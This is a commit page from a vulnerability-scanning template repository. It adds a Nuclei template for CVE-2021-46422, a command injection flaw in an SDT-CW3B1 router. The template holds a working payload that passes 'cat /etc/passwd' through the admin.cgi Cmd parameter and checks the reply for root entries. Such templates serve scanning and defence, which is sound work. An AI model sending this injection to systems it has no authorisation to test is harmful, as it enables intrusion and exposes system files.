Merge pull request #4430 from projectdiscovery/CVE-2021-46422

Create CVE-2021-46422.yaml
patch-1
Prince Chaddha 2022-05-18 14:12:50 +05:30 committed by GitHub
commit b240abad90
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2021-46422
info:
name: SDT-CW3B1 1.1.0 - OS command injection
author: remote
severity: high
reference:
- https://www.exploit-db.com/exploits/50936
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
classification:
cve-id: CVE-2021-46422
metadata:
verified: false
tags: cve,cve2021,injection,rce
variables:
cmd: "cat+/etc/passwd"
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"